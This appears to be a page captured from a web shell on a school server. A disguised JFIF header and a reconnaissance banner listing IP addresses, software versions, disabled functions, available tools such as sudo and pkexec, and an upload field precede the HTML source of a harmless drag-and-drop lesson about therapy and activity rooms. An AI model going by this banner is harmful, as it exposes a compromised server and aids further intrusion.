????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.170 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelC/Category3/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Connect the learning area.</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> #id_boxForPhysiotherapy, #id_boxForOccupationalTherapy, #id_boxForSpeechTherapy, #id_boxForArtRoom, #id_boxForPrayer, #id_boxForComputer { color: red; font-size: 24px; font-family: "Arial Rounded MT Bold"; text-align:center; } #id_spanSpeechTherapy, #id_spanComputer, #id_spanPrayer, #id_spanPhysiotherapy, #id_spanOccupationalTherapy, #id_spanArtRoom { color: red; font-size: 24px; font-family: "Arial Rounded MT Bold"; } #id_options { color: blue; font-size: 26px; font-family: "Arial Rounded MT Bold"; padding-left: 10px; } .style_Td { text-align: center; font-size: 36px; font-family: "Arial Rounded MT Bold"; } .style_Questions { padding-left: 10px; text-align: left; font-size: 24px; font-family: "Arial Rounded MT Bold"; font-weight: bold; color: #000; } </style> <script> function page_preLoad() { setPageImages(); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No3, 11), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); } function page_onLoad() { shared_set_debugInfo(Level.C, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); } function setPageImages() { var imagePath = '../../../img/LevelC/Category3/LevelCCat3Lesson11/'; shared_setImageSource('id_imgPhysiotherapy', imagePath, 'physiotherapy.png'); shared_setImageSource('id_imgOccupationalTherapy', imagePath, 'occupationalTherapy.png'); shared_setImageSource('id_imgSpeechTherapy', imagePath, 'speechTherapy.png'); shared_setImageSource('id_imgArtRoom', imagePath, 'artRoom.png'); shared_setImageSource('id_imgComputer', imagePath, 'computer.png'); shared_setImageSource('id_imgPrayer', imagePath, 'prayer.png'); } function btnHome_click() { shared_btnHomeCategories_click('LevelC'); } function btnPrevious_click() { window.location = "LevelCCat3Lesson10.html"; } function btnNext_click() { window.location = "LevelCCat3Lesson12.html"; } function DragDrop(id_dropBox) { shared_setTextAndBackgroundColorToGreenByTrimmingText(shared_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); } function isAllInfosMovedShowClapsAnimation() { var allElementIdsArray = ['id_spanSpeechTherapy', 'id_spanComputer', 'id_spanPrayer', 'id_spanPhysiotherapy', 'id_spanOccupationalTherapy', 'id_spanArtRoom']; shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image'); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <header height="100%"> <div id="id_tblHeader" align="center"></div> </header> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellpadding="5" cellspacing="0"> <tr height="100%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none"> <tr height="5%"> <td class="style_Questions" style="padding-left:10px; color:blue"> <u>Follow the visual clues and connect to the learning area.</u> </td> </tr> <tr height="12%"> <td style="border-top: 0px; border-bottom:none"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="50%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="*" id="id_options">Options:</td> <td class="style_Td" width="40%"><span id="id_spanSpeechTherapy" class="cls_spanSpeechTherapy" draggable="true" ondragstart="shared_dragStart(event)">Speech therapy</span></td> <td class="style_Td" width="20%"><span id="id_spanComputer" class="cls_spanComputer" draggable="true" ondragstart="shared_dragStart(event)">Computer</span></td> <td class="style_Td" width="20%"><span id="id_spanPrayer" class="cls_spanPrayer" draggable="true" ondragstart="shared_dragStart(event)">Prayer</span></td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="*"></td> <td class="style_Td" width="23%"><span id="id_spanPhysiotherapy" class="cls_spanPhysiotherapy" draggable="true" ondragstart="shared_dragStart(event)">Physiotherapy</span></td> <td class="style_Td" width="42%"><span id="id_spanOccupationalTherapy" class="cls_spanOccupationalTherapy" draggable="true" ondragstart="shared_dragStart(event)">Occupational therapy</span></td> <td class="style_Td" width="23%"><span id="id_spanArtRoom" class="cls_spanArtRoom" draggable="true" ondragstart="shared_dragStart(event)">Art room</span></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td style="border-top: none; border-right:none; border-left: none"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border: none"> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgPhysiotherapy" width="35%" height="70%"> </td> <td id="id_boxForPhysiotherapy" class="cls_boxForPhysiotherapy" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForPhysiotherapy')" ondragover="shared_allowDrop(event)"><span>__</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgOccupationalTherapy" width="35%" height="70%"> </td> <td id="id_boxForOccupationalTherapy" class="cls_boxForOccupationalTherapy" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForOccupationalTherapy')" ondragover="shared_allowDrop(event)"><span>__</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgSpeechTherapy" width="35%" height="70%"> </td> <td id="id_boxForSpeechTherapy" class="cls_boxForSpeechTherapy" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForSpeechTherapy')" ondragover="shared_allowDrop(event)"><span>__</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgArtRoom" width="35%" height="70%"> </td> <td id="id_boxForArtRoom" class="cls_boxForArtRoom" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForArtRoom')" ondragover="shared_allowDrop(event)"><span>__</span></td> </tr> <tr height="17%"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgComputer" width="35%" height="70%"> </td> <td id="id_boxForComputer" class="cls_boxForComputer" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForComputer')" ondragover="shared_allowDrop(event)"><span>__</span></td> </tr> <tr height="*"> <td class="style_Td" width="60%" style="border-bottom: none"> <img id="id_imgPrayer" width="35%" height="70%"> </td> <td id="id_boxForPrayer" class="cls_boxForPrayer" width="*" style="border-left: none; border-bottom: none" ondrop="DragDrop('id_boxForPrayer')" ondragover="shared_allowDrop(event)"><span>__</span></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="5%"> <td> <footer height="100%"> <div id="id_tblFooter" align="center"></div> </footer> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_spanSpeechTherapy', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanSpeechTherapy'}}); new webkit_draggable('id_spanComputer', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanComputer'}}); new webkit_draggable('id_spanPrayer', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanPrayer'}}); new webkit_draggable('id_spanPhysiotherapy', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanPhysiotherapy'}}); new webkit_draggable('id_spanOccupationalTherapy', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanOccupationalTherapy'}}); new webkit_draggable('id_spanArtRoom', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_spanArtRoom'}}); webkit_drop.add('id_boxForPhysiotherapy', {accept:["cls_spanPhysiotherapy"], onDrop : function(){DragDrop('id_boxForPhysiotherapy')}}); webkit_drop.add('id_boxForOccupationalTherapy', {accept:["cls_spanOccupationalTherapy"], onDrop : function(){DragDrop('id_boxForOccupationalTherapy')}}); webkit_drop.add('id_boxForSpeechTherapy', {accept:["cls_spanSpeechTherapy"], onDrop : function(){DragDrop('id_boxForSpeechTherapy')}}); webkit_drop.add('id_boxForArtRoom', {accept:["cls_spanArtRoom"], onDrop : function(){DragDrop('id_boxForArtRoom')}}); webkit_drop.add('id_boxForComputer', {accept:["cls_spanComputer"], onDrop : function(){DragDrop('id_boxForComputer')}}); webkit_drop.add('id_boxForPrayer', {accept:["cls_spanPrayer"], onDrop : function(){DragDrop('id_boxForPrayer')}}); </script> </body> </html>